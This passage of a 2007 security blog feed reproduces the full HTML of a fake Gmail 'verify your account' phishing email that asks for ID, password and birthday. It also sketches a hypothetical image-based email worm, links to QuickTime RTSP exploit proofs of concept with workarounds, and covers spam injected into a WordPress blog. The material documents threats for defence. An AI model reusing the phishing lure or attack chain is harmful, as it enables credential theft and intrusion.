&lt;table cellspacing=&quot;0&quot; cellpadding=&quot;4&quot; width=&quot;585&quot; border=&quot;0&quot;&gt;
&lt;tbody&gt;
&lt;tr bgcolor=&quot;#a0b8c8&quot;&gt;
&lt;td colspan=&quot;2&quot;&gt;
&lt;div align=&quot;center&quot;&gt;&lt;font face=&quot;Arial&quot;&gt;&lt;font face=&quot;Arial Narrow&quot; size=&quot;4&quot;&gt;&lt;u&gt;&lt;strong&gt;VERIFY YOUR GMAIL ACCOUNT NOW TO AVOID CLOSE&amp;nbsp;!!!&lt;/strong&gt;&lt;/u&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;strong&gt;&lt;font size=&quot;5&quot;&gt;&lt;font face=&quot;arial&quot;&gt;&lt;/font&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;
&lt;font face=&quot;Arial
 Cyr&quot; size=&quot;2&quot;&gt;&lt;font face=&quot;Arial Cyr&quot; size=&quot;2&quot;&gt;&lt;strong&gt;&lt;font face=&quot;Arial&quot;&gt;&lt;font size=&quot;7&quot;&gt;&lt;u&gt;&lt;font color=&quot;#0000bf&quot;&gt;G&lt;/font&gt;&lt;font color=&quot;#ff0000&quot;&gt;M&lt;/font&gt;&lt;font color=&quot;#ffff00&quot;&gt;A&lt;/font&gt;&lt;font color=&quot;#0000bf&quot;&gt;I&lt;/font&gt;&lt;font color=&quot;#007f40&quot;&gt;
 L&lt;/font&gt;&lt;/u&gt;&lt;/font&gt;&lt;/font&gt;&lt;br&gt;&lt;/strong&gt;&lt;span style=&quot;FONT-SIZE: 21px; FONT-FAMILY: Arial&quot;&gt;&lt;font color=&quot;#ff0000&quot;&gt;Dear&lt;/font&gt;&lt;font color=&quot;#ff0000&quot;&gt;&amp;nbsp;Member&lt;/font&gt;&lt;font color=&quot;#ff0000&quot;&gt;&lt;strong&gt;,&lt;/strong&gt;&lt;/font&gt;&lt;/span&gt;&lt;/font&gt;&lt;/font&gt;
 &lt;/font&gt;&lt;/div&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;font face=&quot;Arial Cyr&quot; color=&quot;#124282&quot; size=&quot;2&quot;&gt;&lt;span style=&quot;FONT-SIZE: 13px; FONT-FAMILY: Arial&quot;&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;FONT-SIZE: 10pt; COLOR: rgb(18,66,130); FONT-FAMILY: Arial&quot;&gt;&lt;font color=&quot;#0000ff&quot;&gt;&lt;span style=&quot;FONT-SIZE: 10pt; FONT-FAMILY: Arial&quot;&gt;&lt;font color=&quot;#00007f&quot;&gt;This message is from gmail message center to all&amp;nbsp;gmail free account owners and premium account owners. We are currently upgrading our data base and e-mail account center. We are deleting all unused&amp;nbsp;gmail account to create more space for new accounts.
&lt;/font&gt;&lt;/span&gt;&lt;/font&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;FONT-SIZE: 10pt; COLOR: rgb(18,66,130); FONT-FAMILY: Arial&quot;&gt;&lt;/span&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;MARGIN: 0in 0in 0pt&quot;&gt;&lt;font face=&quot;Times

 New

 Roman&quot;&gt;&lt;strong&gt;To prevent your account from closing, you will have to&amp;nbsp;verify it&amp;nbsp;below so that we will know that it&amp;#39;s a present used account.&lt;/strong&gt;&lt;/font&gt;&lt;/div&gt;&lt;span style=&quot;FONT-SIZE: 10pt; COLOR: rgb(18,66,130)&quot;&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;FONT-SIZE: 10pt; COLOR: rgb(18,66,130)&quot;&gt;&lt;/span&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 10pt; COLOR: rgb(18,66,130); FONT-FAMILY: Arial&quot;&gt;
&lt;table cellspacing=&quot;0&quot; cellpadding=&quot;4&quot; width=&quot;585&quot; border=&quot;0&quot;&gt;
&lt;tbody&gt;
&lt;tr bgcolor=&quot;#a0b8c8&quot;&gt;
&lt;td colspan=&quot;2&quot;&gt;&lt;font size=&quot;4&quot;&gt;
&lt;div&gt;&lt;strong&gt;
&lt;font size=&quot;4&quot;&gt;
&lt;div&gt;&lt;strong&gt;CONFIRM YOUR IDENTITY. VERIFY YOUR FREE GMAIL ACCOUNT NOW !!!&lt;/strong&gt; &lt;/div&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/div&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;
&lt;div&gt;&lt;strong&gt;&lt;font size=&quot;5&quot;&gt;&lt;font face=&quot;arial&quot;&gt;&amp;nbsp;
&lt;div&gt;
&lt;div&gt;&lt;img style=&quot;WIDTH: 469px; HEIGHT: 75px&quot; height=&quot;75&quot; src=&quot;http://pics.ebaystatic.com/aw/pics/securityCenter/hdr1_649x75.gif&quot; width=&quot;649&quot;&gt;&lt;/div&gt;
&lt;div&gt;&lt;font size=&quot;2&quot;&gt;&lt;font face=&quot;Verdana&quot;&gt;&lt;strong&gt;&lt;a href=&quot;http://amazon.com/&quot; target=&quot;_blank&quot; rel=&quot;nofollow&quot;&gt;&lt;span id=&quot;lw_1190759841_12&quot;&gt;&lt;font color=&quot;#003399&quot;&gt;&lt;/font&gt;&lt;/span&gt;&lt;/a&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/font&gt;&amp;nbsp;&lt;/div&gt;&lt;/div&gt;&lt;/font&gt;
&lt;/font&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div&gt;&lt;strong&gt;&lt;font size=&quot;5&quot;&gt;&lt;font face=&quot;arial&quot;&gt;&lt;font face=&quot;arial narrow&quot; size=&quot;4&quot;&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;MARGIN: 0in 0in 0pt&quot;&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 13.5pt&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Gmail! ID:.........................&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;MARGIN: 0in 0in 0pt&quot;&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 13.5pt&quot;&gt;&lt;/span&gt;&lt;/strong&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;MARGIN: 0in 0in 0pt&quot;&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 13.5pt&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Password:........................&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;MARGIN: 0in 0in 0pt&quot;&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 13.5pt&quot;&gt;&lt;/span&gt;&lt;/strong&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;MARGIN: 0in 0in 0pt&quot;&gt;&lt;font size=&quot;4&quot;&gt;&lt;font face=&quot;arial narrow&quot;&gt;&lt;strong style=&quot;FONT-FAMILY: arial narrow&quot;&gt;&lt;span style=&quot;FONT-SIZE: 13.5pt&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Your Birthday:.................&lt;/span&gt;&lt;/strong&gt;
 &lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;MARGIN: 0in 0in 0pt&quot;&gt;&lt;font size=&quot;4&quot;&gt;&lt;font face=&quot;arial
 narrow&quot;&gt;&lt;strong style=&quot;FONT-FAMILY: arial narrow&quot;&gt;&lt;span style=&quot;FONT-SIZE: 13.5pt&quot;&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/font&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;MARGIN: 0in 0in 0pt&quot;&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 13.5pt&quot;&gt;&lt;label for=&quot;persistent&quot;&gt;&lt;/label&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Your Country or Territory:...........&lt;/span&gt;&lt;/strong&gt; &lt;/div&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/strong&gt;
&lt;/div&gt;
&lt;div&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Enter the &lt;strong&gt;Security Characters:.........&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;img style=&quot;WIDTH: 125px; HEIGHT: 38px&quot; alt=&quot;Registration Verification Code&quot; src=&quot;https://ab.login.yahoo.com/img/LVnEpeVZFekTjDHcj06RTVxEZ3._lwVb0bZmRLXJUxldX3JOnZnejReq4nmXD_..xGmoMjBT9h9WFcSARc5o427WyZP6hQ1z1juqhTkOyV68FA04yd2HiHVj.jpg&quot; border=&quot;0&quot;&gt;
 &lt;/strong&gt;&lt;/div&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;FONT-SIZE: 10pt; COLOR: rgb(18,66,130); FONT-FAMILY: Arial&quot;&gt;&lt;/span&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;FONT-SIZE: 10pt; COLOR: rgb(18,66,130); FONT-FAMILY: Arial&quot;&gt;&lt;img style=&quot;WIDTH: 148px; HEIGHT: 53px&quot; height=&quot;139&quot; src=&quot;http://www.genbeta.com/images/2007/01/gmail%20logo%20blanco.gif&quot; width=&quot;118&quot;&gt;
 &lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 12pt; COLOR: red; FONT-FAMILY: Arial&quot;&gt;Warning!!! &amp;nbsp;&lt;/span&gt; &lt;/strong&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 12pt; COLOR: black&quot;&gt;Account owner that refuses to update his or her account before two weeks of receiving this warning will lose his or her account permanently.
&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 12pt; COLOR: black&quot;&gt;&lt;/span&gt;&lt;/strong&gt;&amp;nbsp;&lt;/div&gt;
&lt;div&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 12pt; COLOR: black&quot;&gt;Sincerely,&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div&gt;&lt;strong&gt;&lt;span style=&quot;FONT-SIZE: 12pt; COLOR: black&quot;&gt;Gmail Team&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;&lt;/span&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;

------=_Part_11145_31274162.1197116792293--
</pre>
<dt style="margin-bottom:10px">
They used Outlook to published this email and leeched numbers of images across different &#8220;known&#8221; web services &darr;</dt>
<dd class="title" style="border-bottom:1px dotted #ccc"><span class="fl" style="width:100px">Image</span> <span>Sources</span></dd>
<dd class="cl"><span class="fl" style="width:100px"> Gmail Logo: </span> <a href="http://www.google.com/intl/en/press/images/logos/gmail.jpg">Google Presskit logo</a></dd>
<dd class="fl"><span class="fl" style="width:100px">Captcha :</span> <a href="https://ab.login.yahoo.com/img/LVnEpeVZFekTjDHcj06RTVxEZ3._lwVb0bZmRLXJUxldX3JOnZnejReq4nmXD_..xGmoMjBT9h9WFcSARc5o427WyZP6hQ1z1juqhTkOyV68FA04yd2HiHVj.jpg">yahoo (SSL)</a></dd>
<dd class="cl"><span class="fl" style="width:100px">Gmail Logo 2:</span> <a href="http://www.genbeta.com/images/2007/01/gmail%20logo%20blanco.gif">genbeta.com</a> (might be their host)</dd>
<dd class="cl"><span class="fl" style="width:100px">Header:</span> <a href="http://pics.ebaystatic.com/aw/pics/securityCenter/hdr1_649x75.gif">EbayStatic Server</a></dd>
</dl>
<h2>Whats the motiff</h2>
<p>It may seem funny to read the message as this are pretty much a script kiddies at work. I&#8217;m sure that most savvy users will not trust this types of threat. But what most people unaware of is the &#8220;Image&#8221; portions of the message. It can play a big role for expoiting email.</p>
<p class="note" style="padding:10px;margin:10px;width:85%;border:1px solid #eee"><span style="font-weight:700">QuickInfo:</span> Spam &#8220;images&#8221; trends start around <a href="http://www.ironport.com/">june 2006</a> and earlier version of popular email client (Outlook and Thunderbird) doesn&#8217;t block images by default. </p>
<p> If you are familliar with Internet Security in general,you may notice that there is many attemp and proof of concept method in exploiting Images like &#8220;<a href="http://blog.kakkoi.net/uri/aHR0cDovL21pbHcwcm0ub3JnL2V4cGxvaXRzLzQ2MTY.curie,80,302" rel="external nofollow" title="Tiff Exploit Sources at Milw0rm">TIFF</a> &#038; <a href="http://www.google.com/search?q=microsoft+jpeg+exploit" rev="google:query" rel="external">JPEG</a>&#8220;. Both of this vulnurebilities exists in Internet Explorer Browser and various microsoft windows products. While we can only make educated guesses as there is no real working proof yet.</p>
<p><tt>My doodling scenario produce this &darr;</tt></p>
<p class="note" style="padding:10px;margin:10pxl;background-color:#f9f9f9;width:95%"> Session &#8220;hacker&#8221; create a malicious server side image &rarr; proxy tunnel send to multiple email server &rarr; the curious victim open the email &rarr; steal client informations (cookie or server session cookie) &rarr; spoof the request &rarr; send RST back to client (reset) &rarr; dump the victims data in one instance. &rarr; write signature on victim email (avoid loop) &rarr; propogate using victims session &rarr; new net-worm is born</p>
<p> Try <abbr title="search">digging</abbr> around <strong>VX Heavens</strong> &#038; <strong>milw0rm</strong> Database you&#8217;ll find something to start thinkering.</p>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/vulnerability/email-phising-and-spam-trends/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Block Apple Quicktime ActiveX &#038; RTSP Exploit</title>
		<link>http://42.kaizeku.com/apple/block-apple-quicktime-activex-rtsp-exploit/</link>
		<comments>http://42.kaizeku.com/apple/block-apple-quicktime-activex-rtsp-exploit/#comments</comments>
		<pubDate>Thu, 06 Dec 2007 17:45:50 +0000</pubDate>
		<dc:creator>Nick B</dc:creator>
		
		<category><![CDATA[Apple]]></category>

		<category><![CDATA[QuickTime]]></category>

		<category><![CDATA[mac]]></category>

		<category><![CDATA[buffer+overflow]]></category>

		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[ie6]]></category>

		<category><![CDATA[ie7]]></category>

		<category><![CDATA[internet+explorer]]></category>

		<category><![CDATA[jikto]]></category>

		<category><![CDATA[microsoft]]></category>

		<category><![CDATA[Mozilla Firefox]]></category>

		<category><![CDATA[remote+exploit]]></category>

		<category><![CDATA[RSTP]]></category>

		<category><![CDATA[safari]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/apple/block-apple-quicktime-activex-rtsp-exploit/</guid>
		<description><![CDATA[<p><img width="128" height="128" style="float: left;" alt="Fixes Apple QuickTime" src="http://i.kakkoi.net/leopard/QuickTimePlayer.png" longdesc="http://blog.kakkoi.net/apple/block-apple-quicktime-activex-rtsp-exploit/" title="Quicktime Logo" /><strong style="font-weight:400">Apple QuickTime</strong> contains a stack <a href="http://en.wikipedia.org/wiki/Buffer_overflow" rev="wikipedia:Buffer_overflow" title="buffer overflow" rel="external nofollow">buffer overflow</a> vulnerability in the way it handles the <abbr title="Real Time Streaming Protocol ">RTSP</abbr> Content-Type header. This vulnerability may be exploited by specially crafted RTSP stream protocol</p><strong>Live Example</strong>
<ul class="xoxo nfo">
<li><a href="http://www.gnucitizen.org/blog/backdooring-quicktime-movies/">GNUcitizen- Backdooring QuickTime Movies </a></li>
<li><a href="http://quicktime.tc.columbia.edu/users/iml/movies/mtest.html">Apple QuickTime redirection to the RTSP exploit</a></li>

</ul>
Elia Florio (Symantec) wrap  a good introduction post regarding <a href="http://www.symantec.com/enterprise/security_response/weblog/2007/11/0day_exploit_for_apple_quickti.html">QuickTime 0 day Exploit</a>. 


<h2 style="border-top:1px solid #ccc; margin-top:38px;padding-top:14px">Known Vulnerabilities Proof of concept (milw0rm).</h2>
<ul class="xoxo nfo">
<li><a rel="nofollow" href="http://blog.kakkoi.net/uri/bWlsdzBybS5jb20vZXhwbG9pdHMvNDY3Mw.curie,80,302">Apple QuickTime 7.3 RTSP Response Content-Type Header Stack Buffer Overflow exploit </a> </li>
<li><a rel="nofollow" href="http://blog.kakkoi.net/uri/bWlsdzBybS5jb20vZXhwbG9pdHMvNDY2NA.curie,80,302">Apple QuickTime Remote stack rewrite exploit for Internet Explorer 6 &#38; 7</a></li>
<li><a rel="nofollow" href="http://blog.kakkoi.net/uri/bWlsdzBybS5jb20vZXhwbG9pdHMvNDY1Nw.curie,80,302">Apple QuickTime 7.2/7.3 RTSP Response Universal Exploit (IE7/FF/Opera)</a></li>
<li><a rel="nofollow" href="http://blog.kakkoi.net/uri/bWlsdzBybS5jb20vZXhwbG9pdHMvNDY1MQ.curie,80,302">Apple Quicktime (Vista/XP Sp2 RTSP RESPONSE) Code Exec Exploit</a></li>
</ul>

<h2 style="margin-top:18px;padding-top:14px">Workarounds</h2>
You may try the following workarounds [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src="http://i.kakkoi.net/leopard/QuickTimePlayer.png" style="float: left" alt="Fixes Apple QuickTime" longdesc="http://blog.kakkoi.net/apple/block-apple-quicktime-activex-rtsp-exploit/" title="Quicktime Logo" height="128" width="128" /><strong style="font-weight: 400">Apple QuickTime</strong> contains a stack <a href="http://en.wikipedia.org/wiki/Buffer_overflow" rev="wikipedia:Buffer_overflow" title="buffer overflow" rel="external nofollow">buffer overflow</a> vulnerability in the way it handles the <abbr title="Real Time Streaming Protocol ">RTSP</abbr> Content-Type header. This vulnerability may be exploited by specially crafted RTSP stream protocol</p>
<p><strong>Live Example</strong></p>
<ul class="xoxo nfo">
<li><a href="http://www.gnucitizen.org/blog/backdooring-quicktime-movies/">GNUcitizen- Backdooring QuickTime Movies </a></li>
<li><a href="http://quicktime.tc.columbia.edu/users/iml/movies/mtest.html">Apple QuickTime redirection to the RTSP exploit</a></li>
</ul>
<p>Elia Florio (Symantec) wrap a good introduction post regarding <a href="http://www.symantec.com/enterprise/security_response/weblog/2007/11/0day_exploit_for_apple_quickti.html">QuickTime 0 day Exploit</a>.<br />
<span id="more-62"></span></p>
<h2 style="border-top: 1px solid #cccccc; margin-top: 38px; padding-top: 14px">Known Vulnerabilities Proof of concept (milw0rm).</h2>
<ul class="xoxo nfo">
<li><a href="http://blog.kakkoi.net/uri/bWlsdzBybS5jb20vZXhwbG9pdHMvNDY3Mw.curie,80,302" rel="nofollow">Apple QuickTime 7.3 RTSP Response Content-Type Header Stack Buffer Overflow exploit </a></li>
<li><a href="http://blog.kakkoi.net/uri/bWlsdzBybS5jb20vZXhwbG9pdHMvNDY2NA.curie,80,302" rel="nofollow">Apple QuickTime Remote stack rewrite exploit for Internet Explorer 6 &amp; 7</a></li>
<li><a href="http://blog.kakkoi.net/uri/bWlsdzBybS5jb20vZXhwbG9pdHMvNDY1Nw.curie,80,302" rel="nofollow">Apple QuickTime 7.2/7.3 RTSP Response Universal Exploit (IE7/FF/Opera)</a></li>
<li><a href="http://blog.kakkoi.net/uri/bWlsdzBybS5jb20vZXhwbG9pdHMvNDY1MQ.curie,80,302" rel="nofollow">Apple Quicktime (Vista/XP Sp2 RTSP RESPONSE) Code Exec Exploit</a></li>
</ul>
<h2 style="margin-top: 18px; padding-top: 14px">Workarounds</h2>
<p>You may try the following workarounds, as there is no complete patch for this this vulnerability.</p>
<ul id="downloads" class="xoxo nfo">
<li> Block TCP <strong>port 554 </strong> (optionaly 7070) and UDP 6970 through 6999 in your firewall</li>
<li>Update <a href="http://www.apple.com/quicktime/download/">Quicktime</a></li>
<li> <a href="http://blog.kakkoi.net/wp-content/uploads/2007/12/disabledquicktimeactivex-kb240797.reg" title="DisabledQuicktimeActiveX-KB240797">Disabled Apple Quicktime ActiveX control running in Internet Explorer</a> (Windows registry file)</li>
<li>For Firefox - <a href="http://noscript.net/">Noscripts</a> addons</li>
</ul>
<h2 style="border-top: 1px solid #cccccc; margin-top: 38px; padding-top: 14px">Related Links</h2>
<ul class="xoxo">
<li><a href="http://info.internet.isi.edu/in-notes/rfc/files/rfc2326.txt">RTSP - rfc2326 </a> &amp; <a href="http://info.internet.isi.edu/in-notes/rfc/files/rfc1889.txt">RTP - rfc1889 </a></li>
<li><a href="http://docs.info.apple.com/article.html?artnum=307038">Apple Security Update on Safari 3 Beta Update 3.0.4</a></li>
<li><a href="http://nvd.nist.gov/nvd.cfm?cvename=CVE-2002-0252">NVD Database - Buffer overflow in Apple QuickTime</a></li>
<li><a href="http://support.microsoft.com/kb/240797">Microsoft KB240797 - How to stop an ActiveX control from running in Internet Explorer</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/apple/block-apple-quicktime-activex-rtsp-exploit/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Matt Heaton BlueHost HostMonster CEO Official Blog Hacked</title>
		<link>http://42.kaizeku.com/wordpress/bluehost-hostmonster-ceo-blog-got-hacked/</link>
		<comments>http://42.kaizeku.com/wordpress/bluehost-hostmonster-ceo-blog-got-hacked/#comments</comments>
		<pubDate>Sat, 01 Dec 2007 09:55:53 +0000</pubDate>
		<dc:creator>Avice De'veréux</dc:creator>
		
		<category><![CDATA[Bluehost]]></category>

		<category><![CDATA[HostMonster]]></category>

		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[Blackhat]]></category>

		<category><![CDATA[class-mail]]></category>

		<category><![CDATA[cloacking]]></category>

		<category><![CDATA[DoS+Vulnerability]]></category>

		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[goro+spam]]></category>

		<category><![CDATA[injection]]></category>

		<category><![CDATA[localrank]]></category>

		<category><![CDATA[matt+heaton]]></category>

		<category><![CDATA[mick+jagger]]></category>

		<category><![CDATA[milw0rm]]></category>

		<category><![CDATA[networm]]></category>

		<category><![CDATA[php]]></category>

		<category><![CDATA[RealTime+Streaming+Protocol]]></category>

		<category><![CDATA[remote+injection]]></category>

		<category><![CDATA[RSTP]]></category>

		<category><![CDATA[script+injection]]></category>

		<category><![CDATA[sybil+attack]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[xmlrpc]]></category>

		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/wordpress/bluehost-hostmonster-ceo-hacked/</guid>
		<description><![CDATA[<img alt="bluehost hosmonster" src="http://i.kakkoi.net/blue-host-monster.png" title="bluehost hostmonster" style="float:left;margin: 0pt 5px 1px 0pt;" />Just after the recent issue on <a href="http://blog.kakkoi.net/uri/d3d3LmN3cmJsb2cubmV0LzQ4L3dvcmRwcmVzc2NvbWNuLWRlbGV0ZS11c2VyLWFjY291bnRzLXdpdGhvdXQtbm90aWNlcy5odG1s.curie,80,302">wordpress.com.cn</a> now there is new wordpress imitater. A remote spamware injection by <strong>wordpress.net.in</strong><p class="vcard">I was reading one of <a href="http://blog.kakkoi.net/uri/bWF0dGhlYXRvbi5jb20vP3A9MTA5.curie,80,302" rev="matheatton" rel="external robots-nofollow nofollow" class="curie url fn"><span class="given-name">Matt</span> <span class="family-name">Heaton</span></a><a href="http://blog.kakkoi.net/uri/bWF0dGhlYXRvbi5jb20vP3A9MTA5.curie,80,302" rev="matheatton" rel="external robots-nofollow nofollow" class="curie"> posted 2 days</a> ago when  I  found bunch of spamsware link on <a rev="mattheaton:blog" href="http://blog.kakkoi.net/wp-content/uploads/2007/12/mattheatoncom-wordpress-footer.png" title='view mattheaton.com wordpress footer'>his wordpress footer</a>.</p>
<p> Matt's is using default wodpress theme (kubrick) with single javascript for adsense. The only way the spams can get in is probably via php injection or by manual editing. All the spamware is redirect to <tt>howardowens.com/?order=XX</tt> page</p>]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p class="notice mgb"><small>Dec 11 2007</small> - Matt Heaton Blog&#8217;s has been cleansed. ATM he&#8217;s using latest version of WordPress (2.3.x). And also most of the blogs lists in this articles has been upgrade. </p>
<p class="notice mgt mgb"><small>Jan 26th, 2008</small> - Seem like bluehost engineer did a bad job at cleaning, <a href="/wordpress/mattheaton-bluehost-hostmonster-ceo-hacked/">the goro spam is back</a>. </p>
<p><img alt="bluehost hosmonster" src="http://i.kakkoi.net/blue-host-monster.png" title="bluehost hostmonster" class="thumb- fl" />Just after the recent issue on <a href="http://blog.kakkoi.net/uri/d3d3LmN3cmJsb2cubmV0LzQ4L3dvcmRwcmVzc2NvbWNuLWRlbGV0ZS11c2VyLWFjY291bnRzLXdpdGhvdXQtbm90aWNlcy5odG1s.curie,80,302">wordpress.com.cn</a> now there is new wordpress imitater. A remote spamware injection by <strong>wordpress.net.in</strong>
<p class="vcard">I was reading one of <a href="http://blog.kakkoi.net/uri/bWF0dGhlYXRvbi5jb20vP3A9MTA5.curie,80,302" rev="matheatton" rel="external robots-nofollow nofollow" class="curie url fn"><strong class="given-name" style="font-weight:400">Matt</strong> <strong class="family-name" style="font-weight:400">Heaton</strong></a><a href="http://blog.kakkoi.net/uri/bWF0dGhlYXRvbi5jb20vP3A9MTA5.curie,80,302" rev="matheatton" rel="external robots-nofollow nofollow" class="curie"> posted 2 days</a> ago when I found bunch of spamsware link on <a rev="mattheaton:blog" href="http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/mattheatoncom-wordpress-footer.png" title='view mattheaton.com wordpress footer'>his wordpress footer</a>.</p>
<p stle="text-align:right" class="cb"><a href="http://blog.kakkoi.net/uri/d3d3LnNoYXJlYXBpYy5uZXQvY29udGVudC5waHA_aWQ9NDY5MTczNA.curie,80,302" rel="nofollow" rev="sharepic:mattheatonfooter"><img src="http://gmodules.com/ig/proxy?url=http://www.shareapic.net/preview2/004691734.png" class="fr" alt="mattheaton.com bluehost ceo hack wordpress footer" width="130" height="68" /></a></p>
<p> Matt&#8217;s is using default wodpress theme (kubrick) with single javascript for adsense. The only way the spams can get in is probably via php injection or by manual editing. All the spamware is redirect to <tt>howardowens.com/?order=XX</tt> page.</p>
<h3 id="lookup-results" style="margin-top:36px">Lookup for howardowens.com</h3>
<p>The below diagram explained the lookup results for <a href="http://www.howardowens.com">howardowens.com</a>. <small>click on the image to enlarge.</small></p>
<p><a href='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/lookup-results-for-howardowens-com.png' title='lookup results for howardowens-com'><img src='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/lookup-results-for-howardowens-com.thumbnail.png' alt='lookup results for howardowens-com' /></a><br />
Surprisingly the <span style="text-decoration:line-through">spammer</span> website is also host by bluehost.com (69.89.16.0/20,74.220.192.0/19 ,69.89.16.4 -> box183.bluehost.com).
</p>
<p><span id="more-44"></span></p>
<h2 id="tracking-summary" style="margin-top:18px; border-top: 1px solid #ccc; padding-top:18px" class="sumarry">
Tracking the spam sources.<br />
</h2>
<div class="description">
<p><a href="http://blog.kakkoi.net/uri/d3d3LnNoYXJlYXBpYy5uZXQvY29udGVudC5waHA_aWQ9NDY2OTg1Mw.curie,80,302" rel="nofollow" title="MattHeaton.com Blog Hacked Screenshot"><img src="http://gmodules.com/ig/proxy?url=http://www.shareapic.net/preview2/004669853.png" alt="mattheaton.com hacked" width="15" height="130" class="fl" /></a>Viewing <span class="vcard"><a href="view-source:http://mattheaton.com" class="url fn org">mattheaton.com</a></span> html sources I found some hint and start searching for <tt style="background-color:#fff7c7;color:#333;padding:3px">xanax intext:id=\&#8221;goro\&#8221;</tt>. Google return <a href="http://www.google.com/search?q=xanax+intext%3Aid%3D%5C%22goro%5C%22" rel="external nofollow robots-nofollow" rev="google:result">2 results</a> for this query. </p>
<dl id="meta-search-results" class="google-query cb" style="line-height:1.6em">
<dt style="float:left;margin-right:3px;width:150px"><small>1.</small>&nbsp;Wordpress Support</dt>
